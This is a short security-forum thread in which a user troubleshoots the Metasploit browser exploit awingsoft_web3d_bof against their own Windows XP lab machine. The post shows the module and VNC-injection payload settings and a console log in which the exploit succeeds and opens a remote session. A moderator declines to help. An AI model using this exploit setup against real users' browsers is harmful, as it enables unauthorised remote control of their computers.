Results 1 to 2 of 2

Thread: Trouble with awingsoft_web3d_bof exploit- please help!!

  1. #1
    Just burned his ISO
    Join Date
    Nov 2009
    Posts
    1

    Default Trouble with awingsoft_web3d_bof exploit- please help!!

    Hello all,

    I have been trying to use the windows/browser/awingsoft_web3d_bof exploit on a windows XP S2 machine from a Ubuntu machine. I installed the plugin of AwingSoft Web3D Player for IE.

    The following are options I have set

    Module options:

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    SRVHOST 192.168.0.102 yes The local host to listen on.
    SRVPORT 8081 yes The local port to listen on.
    SSL false no Negotiate SSL for incoming connections
    SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
    URIPATH no The URI to use for this exploit (default is random)


    Payload options (windows/vncinject/bind_tcp):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    AUTOVNC true yes Automatically launch VNC viewer if present
    EXITFUNC process yes Exit technique: seh, thread, process
    LPORT 4444 yes The local port
    RHOST no The target address
    VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
    VNCPORT 5900 yes The local port to use for the VNC proxy

    when i ran the exploit, following messages appeared.
    msf exploit(awingsoft_web3d_bof) > exploit[*] Exploit running as background job.
    msf exploit(awingsoft_web3d_bof) > [*] Using U*R*L: [u*r*l]****a address with the srvhost and srvport was given****[*] Server started.[*] Started bind handler
    +++++ At this point, I pasted the above address on the xp machine's IE browser. ++++[*] Sending exploit to 192.168.0.101:2118...
    +++++ At this point, IE crashes. ++++++[*] Sending stage (197120 bytes)[*] VNC Server session 6 opened (192.168.0.102:59407 -> 192.168.0.101:4444)[*] Starting local TCP relay on 127.0.0.1:5900...[*] Local TCP relay started.[*] Launched vnciewer in the background.

    1. VNC viewer is installed, and is in my path.
    2. I set the DLL to the absolute address of vncdll.dll location .
    3. I even set AutoVNC to false and started the vnc viewer in listen mode.

    But the vnc viewer did not open.
    Instead, metasploit courtesy shell opened on the target machine. I do not understand if there anything else I have to set? Why does it say vnc viewer is launched when i see nothing. I see
    amulya 4685 0.0 0.0 4840 1624 pts/3 S 23:39 0:00 vncviewer 127.0.0.1::5900
    in my process list but still do not see a VNC session. Any inputs appreciated.

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by amulya View Post
    I have been trying to use the windows/browser/awingsoft_web3d_bof exploit on a windows XP S2 machine from a Ubuntu machine.
    I'm sorry but we do not support ubuntu here.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •